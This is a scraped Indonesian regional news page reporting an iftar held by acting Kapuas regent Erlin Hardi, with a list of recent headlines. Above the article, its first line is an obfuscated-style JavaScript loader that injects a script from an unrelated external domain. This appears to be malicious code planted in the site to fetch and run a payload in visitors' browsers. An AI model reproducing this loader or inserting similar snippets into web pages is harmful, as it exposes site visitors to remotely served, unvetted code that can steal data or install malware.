(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kapuas

Pj Bupati Kapuas Erlin Hardi Buka Puasa Bersama Masyarakat


KANALKALIMANTAN.COM, KUALA KAPUAS – Pemerintah Kabupaten (Pemkab) Kapuas menggelar buka puasa bersama Forkopimda dan masyarakat, Minggu (7/4/2024).

Sejak pukul 16.00 Wib masyarakat berdatangan ke rumah jabatan (rujab) Bupati Kapuas dan memadati ballroom Rujab Bupati Kapuas yang berlokasi di Jalan Jenderal Sudirman.

Buka puasa bersama masyarakat Kapuas ini dihadiiri Pj Bupati Kapuas Erlin Hardi, Sekda Kapuas Septedy, Kajari Kapuas, Dandim 1011/klk, sejumlah pejabat, SOPD, Kemenag Kapuas  para camat dan ASN, lingkup Pemkab Kapuas.

Tak hanya itu, dalam buka puasa bersama ini Pj Bupati Kapuas Erlin Hardi juga mengundang tokoh agama, tokoh masyarakat, wartawan, serta anak yatim piatu.

Baca juga: Pj Bupati Kapuas Erlin Hardi di Mata Tokoh Masyarakat

Pj Bupati Kapuas Erlin Hardi mengucapkan terima kasih atas kehadiran segenap masyarakat yang berpartisipasi dalam acara buka bersama tersebut.

Erlin Hardi berharap agar sinergi antara pemerintah daerah dan masyarakat terus terjalin kuat, demi kemajuan dan kesejahteraan.

“Silaturahmi yang terjalin baik merupakan fondasi utama dalam membangun kebersamaan dan kemajuan bersama,” ungkap Erlin Hardi.

Disamping itu, Pj Bupati Erlin Hardi juga terus mengajak seluruh elemen masyarakat untuk mendoakan dan mendukung Pemerintah Kabupaten Kapuas dalam menjalankan tugas dan kewajiban yang berupaya mewujudkan daerah ini sebagai kabupaten yang maju dan sejahtera.

Baca juga: KH Syaifudin Zuhri Dikebumikan di Tungkaran Martapura, Ribuan Pelayat Antar Kepulangan Ulama Tanah Banjar

Acara juga dirangkai penyerahan hadiah festival bagarakan sahur yang digelar DPD Lasqi Kapuas dan penyerahan bantuan, dilanjutkan tausiah singkat dan shalat mahgrib berjemaah, buka bersama dan ramah tamah. (Kanalkalimantan.com/ags)

Reporter: ags
Editor: kk


Risa

Recent Posts

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

1 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

3 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

3 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

3 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

5 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

6 jam ago

This website uses cookies.